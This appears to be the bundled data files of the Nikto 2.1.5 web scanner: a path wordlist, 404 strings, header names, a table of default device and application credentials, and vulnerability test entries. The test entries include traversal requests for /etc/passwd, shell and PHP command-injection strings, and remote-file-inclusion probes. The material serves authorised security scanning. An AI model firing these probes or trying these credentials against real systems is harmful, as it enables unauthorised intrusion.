inquiries inquiry insert install int interim intermediate internal international internet intl intranet intro ip ipc iphone ips irc is isapi iso issues it item j j2ee j2me jakarta java-plugin javadoc javascript javax jboss jdbc jigsaw jj jmx-console job jobs joe john join joomla journal jp jpa jre jrun json jsso jsx juniper junk jvm k kboard keep kernel keygen keys kids kill known_hosts l labs lang large law layout layouts ldap leader leaders left legacy legal lenya letters level lg library libs license licenses limit line link links linux list listinfo lists live lo loader loading loc local location lock locked log4j logfile logger logging login logins logo logoff logon logos logout logs lost lost+found low ls lucene m mac mail mailer mailing mailman mails main mambo manage management manager manual manuals map maps mark marketing master master.passwd match matrix maven mbox me media medium mem member members membership memory menu message messages messaging microsoft migrate migration mina mini minute mirror mirrors misc mission mix mlist mms mobi mobile mock mod modify mods module modules mojo money monitoring month monthly more motd move movie movies mp mp3 mp3s ms ms-sql msadc msadm msie msql mssql mta multimedia music mx my myadmin myfaces myphpnuke mysql mysqld n nav navigation nc net netbsd netcat nethome nets network networking new news newsletter newsletters newticket next nfs nice nl nobody node none note notes notification notifications notified notifier notify ns nuke nul null oa_servlets oauth obdc obsolete obsoleted odbc ode oem ofbiz office onbound online op open openbsd opendir openejb openjpa opera operations opinion oprocmgr-status opt option options oracle oracle.xml.xsql.XSQLServlet order ordered orders org osc oscommerce other outgoing outline output outreach overview owa ows ows-bin p p2p pack packages page page1 page2 page_1 page_2 pages paid panel paper papers parse partner partners party pass passwd password passwords past patch patches payment payments paypal pbo pc pci pda pdfs pear peek pending people perf performance perl personal pg phf phone phones phorum photo photos phpBB phpBB2 phpEventCalendar phpMyAdmin phpbb phpmyadmin phpnuke phps pic pics pictures pii ping pipe pipermail piranha pivot pix pixel pkg pkgs plain play player playing playlist pls plugin plugins pm poc poi policies policy politics poll polls pool pop pop3 popup porn port portal portals portfolio pos post posted postgres postgresql postnuke postpaid posts pr pr0n premium prepaid presentation presentations preserve press preview previews previous pricing print printenv printer printers priv privacy private pro problems proc procedures prod product product_info production products profile profiles profiling program programming programs project projects promo prop properties property props prot protect protected protection proto proxies proxy prv ps psql pt pub public publication publications pubs pull purchase purchases purchasing push pw pwd python q qotd qpid queries query queue queues quote quotes r radio random rdf read readme realestate receive received recharge record recorded recorder records recovery recycle recycled redir redirect reference reg register registered registration registrations release releases remind reminder remote remove removed render rendered rep repl replica replicas replicate replicated replication replicator reply report reporting reports reprints req reqs request requests requisition requisitions res research resin resize resource resources rest restore restored restricted results retail reverse reversed revert reverted review reviews right roam roaming robot robots roller room root rpc ru rule rules run rwservlet s sale sales sam samba saml sample samples sav saved saves sbin scan scanned scans sched schedule scheduled scheduling schema science screen screens screenshot screenshots script scriptlet scriptlets scripts sdk se search sec second secret section sections secure secured security seed select sell send sendmail sendto sent serial serv serve server server-info server-status servers service services servlet servlets session sessions setting settings setup shadow share shared shares shell ship shipped shipping shop shopper shopping shops shoutbox show show_post show_thread showcat showenv showjobs showmap showmsg showpost showthread sign signed signer signin signing signoff signon signout signup simple sink site site-map site_map sitemap sites skel skin skins skip sl sling sm small smile smiles sms smtp snoop soap soaprouter soft software solaris sold solution solutions source sources soutbox sox sp space spacer spam special specials sponsor sponsors spool sport sports sqlnet squirrel squirrelmail src srv ss ssh ssi ssl sslvpn ssn sso staff staging standalone standard standards star start stat statement statements static staticpages statistic statistics stats status stock storage store stored stories story strut struts student students stuff style styles submissions submit subscribe subscribed subscriber subscribers subscription subscriptions success suite suites sun sunos super support surf survey surveys sws synapse sync synced sys sysmanager system systems sysuser t tag tags tape tapes tapestry tb tcl team tech technical technology tel tele templ template templates terms test-cgi test-env test1 test123 test1234 test2 test3 testimonial testimonials testing tests texis text texts theme themes thread threads thumb thumbnail thumbnails thumbs tickets tiki tiles tip tips title tls tmpl tmps tn toc todo toggle tomcat tool toolbar toolkit tools top topic topics torrent torrents tos tour tpl tpv tr traceroute traces track trackback tracker trackers tracking tracks traffic trailer trailers training trans transparent transport trash travel treasury tree trees trial trunk tsweb tt turbine tuscany tutorial tutorials tv tweak type typo3 typo3conf u ubb uds uk umts union unix unlock unreg unregister unsubscribe up upd update updated updater updates upfile upfiles upload uploader uploads url urls us usa usage user userlog users usr util utilities utility utils v v1 v2 var vault vector velocity vendor ver ver1 ver2 version vfs video videos view view-source viewcvs viewforum viewonline views viewsource viewsvn viewtopic viewvc virtual vm voip vol vote voter votes vpn vuln w w3 w3c wa wap war warez way-board wbboard wc weather web web-beans web-console webaccess webadmin webagent webalizer webapp webb webbbs webboard webcalendar webcart webcasts webcgi webchat webdata webdav webdb weblog weblogic weblogs webmail webplus webshop website websphere websql webstats websvn webwork week weekly welcome whitepapers whois whosonline wicket wiki win win32 windows winnt wireless wml word wordpress work working world wp wp-content wp-dbmanager wp-includes wp-login wp-syntax wrap ws ws-client ws_ftp wtai www www-sql www1 www2 www3 wwwboard wwwroot wwwstats wwwthreads wwwuser wysiwyg x xalan xerces xhtml xmlrpc xslt xsql xxx xyzzy y yahoo year yearly youtube yt z zboard zencart zend zero zipfiles zips zoom zope zorum nikto-2.1.5/databases/db_404_strings0000644000000000000000000000334512024212124015733 0ustar rootroot#VERSION,2.003 # $Id$ ####################################################################### # Source: http://cirt.net # This file may only be distributed and used with the full Nikto package. # This file may not be used with any software product without written permission from CIRT, Inc. # (c) 2007 CIRT, Inc., All Rights Reserved. # # NOTE: By sending any database updates to CIRT, Inc., it is assumed that you # grant CIRT, Inc., the unlimited, non-exclusive right to reuse, modify and relicense the changes. ####################################################################### # Notes: # Strings to be used for 404 content match ####################################################################### Access Failed an error Bad Request Client Authentication Remote Service could not find error has occurred Error 404 Error Occurred While Processing Request Error processing SSI file ExtendNet DX Configuration FireWall-1 message forcelogon.htm IMail Server Web Messaging Management Console name=qt id="search" size=40 value=" " No web site is configured at this address not found parameter is incorrect # IIS 5.0 500 error Please identify yourself: Reload acp_userinfo database RSA SecurID User Name Request The userid or password that was specified is not valid. # Tivoli server administrator TYPE=password # As in "" Unable to complete your request unable to open Web access denied Hack Attempts does not exist # SAP NetWeaver Wrong URL. # Cisco SSL VPN page may no longer exist page no longer exist Your session has expired # cPanel webmail no longer available nikto-2.1.5/databases/db_headers0000644000000000000000000000266112024212124015266 0ustar rootroot#VERSION,2.008 # $Id$ ####################################################################### # Source: http://cirt.net # This file may only be distributed and used with the full Nikto package. # This file may not be used with any software product without written permission from CIRT, Inc. # (c) 2009 CIRT, Inc., All Rights Reserved. # # NOTE: By sending any database updates to CIRT, Inc., it is assumed that you # grant CIRT, Inc., the unlimited, non-exclusive right to reuse, modify and relicense the changes. ####################################################################### # Notes: ####################################################################### "header" "accept" "accept-charset" "accept-encoding" "accept-language" "accept-ranges" "age" "allow" "authorization" "cache-control" "connection" "content-encoding" "content-language" "content-length" "content-location" "content-md5" "content-range" "content-type" "date" "etag" "expect" "expires" "from" "keep-alive" "host" "if-match" "if-modified-since" "if-none-match" "if-range" "if-unmodified-since" "last-modified" "location" "max-forwards" "p3p" "pragma" "proxy-authenticate" "proxy-authorization" "range" "referer" "retry-after" "server" "set-cookie" "te" "trailer" "transfer-encoding" "upgrade" "user-agent" "vary" "via" "warning" "www-authenticate" "whisker" "x-aspnet-version" "x-powered-by" "x-pad" "dasl" "nncoection" "dav" "public" "status" "proxy-connection" "mime-version" nikto-2.1.5/databases/db_realms0000644000000000000000000002340011737523030015143 0ustar rootroot#VERSION,2.002 # $Id$ ####################################################################### # Source: http://cirt.net # This file may only be distributed and used with the full Nikto package. # This file may not be used with any software product without written permission from CIRT, Inc. # (c) 2007 CIRT, Inc., All Rights Reserved. # # NOTE: By sending any database updates to CIRT, Inc., it is assumed that you # grant CIRT, Inc., the unlimited, non-exclusive right to reuse, modify and relicense the changes. ####################################################################### # Notes: # format: realm,id,password,message # @ANY = match any realm name (generic) # If ID and PW fields are blank, realm match is used for message only ######################################################################## "nikto_id","realm","id","password","message" "700000","@ANY","","_Cisco","Cisco device" "700001","@ANY","","0","Accton wireless router" "700002","@ANY","","0000","Deutsche Telekomm T-Sinus 130 DSL" "700003","@ANY","","00000000","Konica/Minolta Di 2010f" "700004","@ANY","","12345","US Robotics modem" "700005","@ANY","","admin","Generic account discovered" "700006","@ANY","","Administrative","Avenger News System" "700007","@ANY","","cisco","Cisco device" "700008","@ANY","","Cisco","Cisco device" "700009","@ANY","","connect","Fujitsu Siemens" "700010","@ANY","","epicrouter","Conexant Router" "700011","@ANY","","intermec","Intermec EasyLAN" "700012","@ANY","","PASSWORD","Kyocera EcoLink" "700013","@ANY","","password","NRG/Ricoh printer" "700014","@ANY","","smcadmin","SMC Router" "700015","@ANY","","Symbol","Symbol Spectrum" "700016","@ANY","","TANDBERG","Tandberg device" "700017","@ANY","","x6zynd56","Polycom ViewStation" "700018","@ANY","1502","1502","X-Micro WLAN 11b router" "700019","@ANY","admin","","Generic account discovered" "700020","@ANY","admin","0000","Infosmart SOHO router" "700021","@ANY","admin","1111","Xerox WorkCentre Pro" "700022","@ANY","admin","1234","Generic account discovered" "700023","@ANY","admin","1234","ZyXEL Prestige" "700024","@ANY","admin","22222","Xerox DocuCentre 425" "700025","@ANY","admin","admin","Generic account discovered." "700026","@ANY","admin","administrator","Efficient Speedstream" "700027","@ANY","admin","articon","Blue Coat systems" "700028","@ANY","admin","asd","NGSec NGSecureWeb" "700029","@ANY","admin","barney","Avaya SIP telephone" "700030","@ANY","admin","barricade","SMC Barricade 7401BRA" "700031","@ANY","admin","demo","OpenMarket Content Server" "700032","@ANY","admin","epicrouter","Generic account discovered" "700033","@ANY","admin","hagpolm1","Siemens SpeedStream 4100" "700034","@ANY","admin","hp.com","Hewlett-Packard webmin" "700035","@ANY","Admin","ImageFolio","BizDesign ImageFolio" "700036","@ANY","admin","ironport","IronPrt C30" "700037","Motive Chorus","admin","isee","Hewlett-Packard Motive Chorus" "700038","@ANY","admin","linga","Alteon ACEswitch 180e" "700039","@ANY","admin","motorola","Motorola wireless router" "700040","@ANY","admin","mp3mystic","MP3Mystic" "700041","@ANY","admin","muze","Muze Ariadne" "700042","@ANY","admin","netadmin","Enterasys ANG-1105" "700043","@ANY","admin","operator","iPSTAR Satellite" "700044","@ANY","admin","password","Generic account discovered" "700045","@ANY","admin","secure","Generic account discovered" "700046","@ANY","admin","setup","Nortel Contivity" "700047","@ANY","admin","smallbusiness","Pirelli AGE-SB" "700048","@ANY","admin","smcadmin","SMC Barricade 7204BRB" "700049","@ANY","admin","synnet","3COM CellPlex" "700050","@ANY","admin","TANDBERG","Tandberg device" "700051","@ANY","admin","tomcat","Apache Tomcat" "700052","@ANY","admin@example.com","admin","MySQL Eventum" "700053","@ANY","Administrator","","Generic account discovered" "700054","@ANY","administrator","**#","Polycom Soundstation IP" "700055","@ANY","Administrator","0000","Snom VoIP business phone" "700056","@ANY","Administrator","1234","Integrated Networks IP Phone" "700057","@ANY","administrator","1234","IntelliTouch Voip Broadband phone" "700058","@ANY","Administrator","12345678","Integrated Networks IP Phone" "700059","@ANY","Administrator","19750407","Luxon Communications/Integrated Networks IP Phone" "700060","@ANY","Administrator","admin","Generic account discovered" "700061","@ANY","administrator","administrator","Compaq WBEM" "700062","@ANY","administrator","administrator","Generic account discovered." "700063","@ANY","administrator","adminpass","NessusWeb" "700064","@ANY","AdvWebadmin","advcomm500349","Hosting Controller" "700065","@ANY","anonymous","","Sambar Server" "700066","@ANY","apc","apc","APC UPS" "700067","@ANY","billy-bob","","Sambar Server" "700068","@ANY","Bobo","hello","OpenMarket Content Server" "700069","@ANY","cac_admin","cacadmin","Openwave MSP" "700070","@ANY","Cisco","Cisco","Cisco device" "700071","@ANY","Coco","hello","OpenMarket Content Server" "700072","@ANY","customer","","Aspect ACD" "700073","@ANY","device","device","APC UPS" "700074","@ANY","e250","e250changeme","Network Associates WebShield Security Appliance e250" "700075","@ANY","e500","e500changeme","Network Associates WebShield Security Appliance e500" "700076","@ANY","Flo","hello","OpenMarket Content Server" "700077","@ANY","ftp","","Sambar Server" "700078","@ANY","guest","","Generic account discovered" "700079","@ANY","guest","guest","Generic account discovered." "700080","@ANY","intel","intel","Intel wireless gateway" "700081","@ANY","jagadmin","","Sybase EAServer" "700082","@ANY","Jetform","","Jetform Design" "700083","@ANY","Joe","hello","OpenMarket Content Server" "700084","@ANY","LDAP_Anonymous","LdapPassword_1","Microsoft SiteServer" "700085","@ANY","manager","admin","Allied Telesyn switch" "700086","@ANY","Manager","fried","Allied Telesyn router" "700087","@ANY","Moe","hello","OpenMarket Content Server" "700088","@ANY","naadmin","naadmin","NetGenesis NetAnalysis Web Reporting" "700089","@ANY","operator","","Magicolor 3100" "700090","@ANY","operator","$schwarzepumpe","Intershop" "700091","@ANY","piranha","piranha","Redhat 6.2" "700092","@ANY","piranha","q","Redhat 6.2" "700093","@ANY","Polycom","SpIp","Polycom Soundpoint VoIP phones" "700094","@ANY","public","public","Samsung Router" "700095","@ANY","role","changethis","Apache Tomcat" "700096","@ANY","role1","role1","Apache Tomcat" "700097","@ANY","Root","","3COM Netbuilder" "700098","@ANY","root","","Generic account discovered" "700099","@ANY","root","calvin","Dell Remote Access Card" "700100","@ANY","root","changeme","Sun Microsystems ILOM/X4100" "700101","@ANY","root","changethis","Apache Tomcat" "700102","@ANY","root","changethis","Apache Tomcat" "700103","@ANY","root","Cisco","Cisco device" "700104","@ANY","root","nsi","NSI vmXfw" "700105","@ANY","root","pass","Axis Webcams" "700106","@ANY","root","password","BestPractical RT" "700107","@ANY","root","root","Apache Tomcat" "700108","@ANY","root","root","Generic account discovered" "700109","@ANY","root","tslinux","Cyclades TS800" "700110","@ANY","sadmin","","Novell NDS iMonitor" "700111","@ANY","smc","smcadmin","SMC Barricade 7401BRA" "700112","@ANY","storwatch","specialist","IBM TotalStorage" "700113","@ANY","super","5777364","Netgear wireless gateway" "700114","@ANY","superadmin","secret","IBM Web administration tool" "700115","@ANY","superman","21241036","Netgear wireless gateway" "700116","@ANY","superuser","admin","Efficient Speedstream" "700117","@ANY","supervisor","PlsChgMe","Nortel Business Communications Manager" "700118","@ANY","support","h179350","Psion Teklogix 9150" "700119","@ANY","sys","uplink","Openwave WAP gateway" "700120","@ANY","sysadmin","password","Ricoh Aficio" "700121","@ANY","system","password","Mitel 3300 ICP" "700122","@ANY","test","test","Generic account discovered." "700123","@ANY","tomcat","changethis","Apache Tomcat" "700124","@ANY","tomcat","tomcat","Apache Tomcat" "700125","@ANY","user_analyst","demo","OpenMarket Content Server" "700126","@ANY","user_approver","demo","OpenMarket Content Server" "700127","@ANY","user_author","demo","OpenMarket Content Server" "700128","@ANY","user_checker","demo","OpenMarket Content Server" "700129","@ANY","user_designer","demo","OpenMarket Content Server" "700130","@ANY","user_editor","demo","OpenMarket Content Server" "700131","@ANY","user_expert","demo","OpenMarket Content Server" "700132","@ANY","user_marketer","demo","OpenMarket Content Server" "700133","@ANY","user_pricer","demo","OpenMarket Content Server" "700134","@ANY","user_publisher","demo","OpenMarket Content Server" "700135","@ANY","user","","D-Link router" "700136","@ANY","User","","D-Link router" "700137","@ANY","webadmin","1234","ZyXEL Prestige" "700138","@ANY","webadmin","webadmin","Broadlogic XLT router" "700139","@ANY","websecadm","changeme","Entrust getAccess" "700140","ConfigToolPassword",,,"Realm matches a Nokia Checkpoint Firewall-1" "700141","daap","","","DAAP (iTunes?) server with authentication." "700142","EIC","root","ncr","Enterprise Intranet Configurator - NCR Teradata server" "700143","Entrust GetAccess SCA","admin","admin","Entrust GetAccess Service Control Agent" "700144","hp print server appliance","admin","admin","HP Print Server" "700145","InterScanVirusWall","admin","admin","Trend Micro's InterScan Virus Wall" "700146","Monitor or Admin","admin","","StorageTek's StorageNet, ID 'admin' with no password" "700147","Monitor or Admin","monitor","","StorageTek's StorageNet, ID monitor' with no password" "700148","Netscape Administration","admin","admin","Netscape server administration" "700149","Netscape Mission Control","admin","admin","Netscape server administration" "700150","Topaz Prism Site","admin","admin","Topaz Prism monitoring from Mercurity Interactive" "700151","Topaz Site Realm","admin","admin","Mercury Interactive Topaz administrator" "700152","UpgradeAdministrator","admin","ncr","NCR's Terradata server, Parallel Upgrade Tool (PUT)" "700153","@ANY","manager","manager","3com switch" nikto-2.1.5/databases/db_tests0000644000000000000000000437575112024311144015040 0ustar rootroot#VERSION,2.019 # $Id$ ####################################################################### # Source: http://cirt.net # This file may only be distributed and used with the full Nikto package. # This file may not be used with any software product without written permission from CIRT, Inc. # (c) 2007 CIRT, Inc., All Rights Reserved. # # NOTE: By sending any database updates to CIRT, Inc., it is assumed that you # grant CIRT, Inc., the unlimited, non-exclusive right to reuse, modify and relicense the changes. ####################################################################### # Notes: # Tuning options (field 3): # 0 - File Upload # 1 - Interesting File / Seen in logs # 2 - Misconfiguration / Default File # 3 - Information Disclosure # 4 - Injection (XSS/Script/HTML) # 5 - Remote File Retrieval - Inside Web Root # 6 - Denial of Service # 7 - Remote File Retrieval - Server Wide # 8 - Command Execution / Remote Shell # 9 - SQL Injection # a - Authentication Bypass # b - Software Identification # c - Remote source inclusion ####################################################################### "000001","0","b","/TiVoConnect?Command=QueryServer","GET","Calypso Server","","","","","The Tivo Calypso server is running. This page will display the version and platform it is running on. Other URLs may allow download of media.","","" "000002","0","b","/TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes","GET","TiVoContainer","","","","","TiVo client service is running and may allow download of mp3 or jpg files.","","" "000003","0","1234576890ab","@CGIDIRScart32.exe","GET","200","","","","","request cart32.exe/cart32clientlist","","" "000004","0","1234576890ab","@CGIDIRSclassified.cgi","GET","200","","","","","Check Phrack 55 for info by RFP","","" "000005","0","1234576890ab","@CGIDIRSdownload.cgi","GET","200","","","","","v1 by Matt Wright; check info in Phrack 55 by RFP","","" "000006","0","1234576890ab","@CGIDIRSflexform.cgi","GET","200","","","","","Check Phrack 55 for info by RFP, allows to append info to writable files.","","" "000007","0","1234576890ab","@CGIDIRSflexform","GET","200","","","","","Check Phrack 55 for info by RFP, allows to append info to writable files.","","" "000008","0","1234576890ab","@CGIDIRSlwgate.cgi","GET","200","","","","","Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7","","" "000009","0","1234576890ab","@CGIDIRSLWGate.cgi","GET","200","","","","","Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7","","" "000010","0","1234576890ab","@CGIDIRSlwgate","GET","200","","","","","Check Phrack 55 for info by RFP","","" "000011","0","1234576890ab","@CGIDIRSLWGate","GET","200","","","","","Check Phrack 55 for info by RFP","","" "000012","0","1234576890ab","@CGIDIRSperlshop.cgi","GET","200","","","","","v3.1 by ARPAnet.com; check info in Phrack 55 by RFP","","" "000013","0","1234576890ab","/cfappman/index.cfm","GET","200","","not found","","","susceptible to ODBC/pipe-style exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm","","" "000014","0","1234576890ab","/cfdocs/examples/cvbeans/beaninfo.cfm","GET","200","","not found","","","susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm","","" "000015","0","1234576890ab","/cfdocs/examples/parks/detail.cfm","GET","200","","not found","","","susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm","","" "000016","0","1234576890ab","/kboard/","GET","200","","","","","KBoard Forum 0.3.0 and prior have a security problem in forum_edit_post.php, forum_post.php and forum_reply.php","","" "000017","0","1234576890ab","/lists/admin/","GET","200","","","","","PHPList pre 2.6.4 contains a number of vulnerabilities including remote administrative access, harvesting user info and more. Default login to admin interface is admin/phplist","","" "000018","0","1234576890ab","/splashAdmin.php","GET","200","","","","","Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely."," ","" "000019","0","1234576890ab","/ssdefs/","GET","200","","","","","Siteseed pre 1.4.2 has 'major' security problems.","","" "000020","0","1234576890ab","/sshome/","GET","200","","","","","Siteseed pre 1.4.2 has 'major' security problems.","","" "000021","0","1234576890ab","/tiki/","GET","200","","","","","Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin","","" "000022","0","1234576890ab","/tiki/tiki-install.php","GET","200","","","","","Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin","","" "000023","0","1234576890ab","/scripts/samples/details.idc","GET","200","","","","","See RFP 9901; www.wiretrip.net","","" "000024","396","6","/_vti_bin/shtml.exe","GET","200","","","","","Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.","","" "000025","0","1","@CGIDIRShandler.cgi","GET","200","","","","","Variation of Irix Handler? Has been seen from other CGI scanners.","","" "000026","0","28","@CGIDIRSfinger","GET","200","","","","","finger other users, may be other commands?","","" "000027","0","28","@CGIDIRSfinger.pl","GET","200","","","","","finger other users, may be other commands?","","" "000028","0","3","@CGIDIRSformmail.cgi","GET","Version ","","","","","The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.","","" "000029","0","3","@CGIDIRSformmail.pl","GET","Version ","","","","","The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.","","" "000030","0","3","@CGIDIRSformmail","GET","Version ","","","","","The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.","","" "000031","0","3","@CGIDIRSget32.exe","GET","200","","","","","This can allow attackers to execute arbitrary commands remotely.","","" "000032","0","3","@CGIDIRSgm-authors.cgi","GET","200","","","","","GreyMatter 'password' file, that controls who can post. This contains login and password information and is installed mode 666 by default. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.","","" "000033","0","3","@CGIDIRSguestbook/passwd","GET","200","","","","","GuestBook r4 from lasource.r2.ru stores the admin password in a plain text file.","","" "000034","3233","3","@CGIDIRShorde/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","","" "000035","0","3","@CGIDIRSphoto/protected/manage.cgi","GET","200","","","","","My Photo Gallery management interface. May allow full access to photo galleries and more. Versions before 3.8 allowed anyone to view contents of any directory on systems.","","" "000036","0","3","@CGIDIRSwrap.cgi","GET","200","","","","","possible variation: comes with IRIX 6.2; allows to view directories","","" "000037","0","3","/./","GET","include\\\(\"","","","","","Appending '/./' to a directory may reveal PHP source code.","","" "000038","637","23","/~root/","GET","200","","","","","Allowed to browse root's home directory.","","" "000039","0","3","/cgi-bin/wrap","GET","200","","","","","comes with IRIX 6.2; allows to view directories","","" "000040","0","3","/forums/@ADMINconfig.php","GET","200","","","","","PHP Config file may contain database IDs and passwords.","","" "000041","0","3","/forums/config.php","GET","200","","","","","PHP Config file may contain database IDs and passwords.","","" "000042","0","3","/ganglia/","GET","Cluster","","","","","Ganglia Cluster reports reveal detailed information.","","" "000043","0","3","/guestbook/guestbookdat","GET","200","","","","","PHP-Gastebuch 1.60 Beta reveals sensitive information about its configuration.","","" "000044","0","3","/guestbook/pwd","GET","200","","","","","PHP-Gastebuch 1.60 Beta reveals the md5 hash of the admin password.","","" "000045","0","3","/help/","GET","200","","","","","Help directory should not be accessible","","" "000046","2411","3","/hola/admin/cms/htmltags.php?datei=./sec/data.php","GET","200","","","","","hola-cms-1.2.9-10 may reveal the administrator ID and password.","","" "000047","0","3","/horde/imp/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","","" "000048","3233","3","/horde/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","","" "000049","3233","3","/imp/horde/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","","" "000050","0","3","/imp/horde/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","","" "000051","0","3","/index.html.bak","GET","[Ii]ndex [Oo]f ","","","","","The remote server (perhaps Web602) shows directory indexes if .bak is appended to the request.","","" "000052","0","3","/index.html~","GET","[Ii]ndex [Oo]f ","","","","","The remote server (perhaps Web602) shows directory indexes if a ~ is appended to the request.","","" "000053","621","7","/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc","GET","resolv\.conf","","","","","phpMyExplorer allows attackers to read directories on the server.","","" "000054","8103","23","/global.inc","GET","200","","","","","PHP-Survey's include file should not be available via the web. Configure the web server to ignore .inc files or change this to global.inc.php","","" "000055","0","3b","@CGIDIRSformmail.pl","GET","200","","","","","Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.","","" "000056","0","3b","@CGIDIRShorde/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","","" "000057","59620","4","/inc/common.load.php","GET","200","","","","","Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.","","" "000058","59619","4","/inc/config.php","GET","200","","","","","Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.","","" "000059","59618","4","/inc/dbase.php","GET","200","","","","","Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.","","" "000060","0","6","@CGIDIRSvisadmin.exe","GET","200","","","","","This CGI allows an attacker to crash the web server. Remove it from the CGI directory.","","" "000061","0","7","@CGIDIRShtml2chtml.cgi","GET","200","","","","","Html2Wml < 0.4.8 access local files via CGI, and more","","" "000062","0","7","@CGIDIRShtml2wml.cgi","GET","200","","","","","Html2Wml < 0.4.8 access local files via CGI, and more","","" "000063","358","7","@CGIDIRSpollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00","GET","root:","","","","","Poll_It_SSI_v2.0.cgi allows attackers to retrieve arbitrary files.","","" "000064","0","8","@CGIDIRSecho.bat?&dir+c:\\","GET","200","","","","","This batch file may allow attackers to execute remote commands.","","" "000065","0","8","@CGIDIRSexcite;IFS=\"$\";/bin/cat /etc/passwd","GET","root:","","200","","","Excite software is vulnerable to command execution.","","" "000066","56","8","@CGIDIRSezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|","GET","200","","","","","EZShopper loadpage CGI command execution","","" "000067","0","8","@CGIDIRSguestbook.cgi","GET","200","","","","","May allow attackers to execute commands as the web daemon.","","" "000068","0","8","@CGIDIRSguestbook.pl","GET","200","","","","","May allow attackers to execute commands as the web daemon.","","" "000069","0","8","@CGIDIRSss","GET","200","","","","","Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.","","" "000070","14026","8","/forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system('id').\"","GET","uid=0","","","","","VBulletin forumdisplay.php remote command execution.","","" "000071","2889","8","/guestbook/guestbook.html","GET","Jason Maloney","","","","","Jason Maloney CGI Guestbook 3.0 allows remote code execution. Bugtraq 2003-12-01","","" "000072","0","8","/html/cgi-bin/cgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","This CGI allows attackers to execute remote commands.","","" "000073","2703","9","/geeklog/users.php","GET","200","","","","","Geeklog prior to 1.3.8-1sr2 contains a SQL injection vulnerability that lets a remote attacker reset admin password.","","" "000074","8204","a","/gb/index.php?login=true","GET","200","","","","","gBook may allow admin login by setting the value 'login' equal to 'true'.","","" "000075","0","a","/guestbook/admin.php","GET","200","","","","","Guestbook admin page available without authentication.","","" "000076","0","b","@CGIDIRSgH.cgi","GET","200","","","","","Web backdoor by gH","","" "000077","0","b","@CGIDIRSgm-cplog.cgi","GET","200","","","","","GreyMatter log file defaults to mode 666 and contains login and passwords used to update the GM site. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.","","" "000078","0","b","/getaccess","GET","200","","","","","This may be an indication that the server is running getAccess for SSO","","" "000079","0","b","/help.html","GET","nice little interface into SPIKE","","","","","SPIKE Proxy may be running. Try using this port as a proxy, and see http://www.immunitysec.com/",".","" "000080","0","3b","@CGIDIRSgm.cgi","GET","200","","","","","GreyMatter blogger may reveal user IDs/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.","","" "000081","5292","c","/filemanager/filemanager_forms.php?lib_path=@RFIURL","GET","PHP Version","","","","","Some versions of PHProjekt allow remote file inclusions. Verify the current version is running. See http://www.securiteam.com/unixfocus/5PP0F1P6KS.html for more info","","" "000082","0","1","@CGIDIRSAT-admin.cgi","GET","200","","","","","Admin interface...","","" "000083","17111","23","@CGIDIRSauth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","","" "000084","0","23","@CGIDIRSawstats.pl","GET","Traffic","","","","","AWStats logfile analyzer.","","" "000085","0","23","@CGIDIRSawstats/awstats.pl","GET","Traffic","","","","","Free realtime logfile analyzer for advanced web statistics. Should be protected.","","" "000086","0","23b","@CGIDIRSblog/mt.cfg","GET","configuration file","","","","","Movable Type configuration file found. Should not be available remotely.","","" "000087","2686","3","@CGIDIRScart.pl?db='","GET","c:\\\\","","","","","Dansie Shopping Cart reveals the full path to the CGI directory.","","" "000088","2686","3","@CGIDIRScart.pl?db='","GET","d:\\\\","","","","","Dansie Shopping Cart reveals the full path to the CGI directory.","","" "000089","292","3","@CGIDIRShtsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=","GET","ht:\\\/\\\/Dig","","","","","The ht://Dig install may reveal the path to its configuration files, revealing sensitive information about the server.","","" "000090","0","3","@CGIDIRSmt-static/mt-check.cgi","GET","200","","","","","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.","","" "000091","0","3","@CGIDIRSmt/mt-check.cgi","GET","200","","","","","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.","","" "000092","0","3","/cfdocs/expeval/openfile.cfm","GET","200","","","","","Can use to expose the system/server path.","","" "000093","0","3","/index.php/123","GET","Premature end of script 